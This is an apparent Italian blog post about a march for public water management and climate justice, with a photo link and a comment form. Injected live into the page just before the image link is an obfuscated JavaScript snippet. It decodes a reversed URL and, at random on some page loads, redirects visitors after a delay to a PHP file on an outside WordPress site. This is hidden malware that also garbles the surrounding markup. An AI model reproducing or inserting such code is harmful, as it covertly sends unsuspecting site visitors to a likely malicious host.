21 novembre 2018

Si scrive acqua, si legge democrazia. Le foto della manifestazione di sabato pomeriggio

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/12/rubinetto_testa.jpg”>

La Manifestazione del 4 dicembre è stata una bella giornata di mobilitazione, non solo per l’acqua pubblica, ma anche per la giustizia climatica. Hanno partecipato vari comitati per l’ambiente e molti cittadini, che hanno sfilato per le vie del centro per chiedere subito la moratoria sulla privatizzazione della gestione dei servizi idrici, e per reclamare il diritto di voto sui quesiti referendari firmati da 1.400.000 cittadini.
Alcune foto visibili qui.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *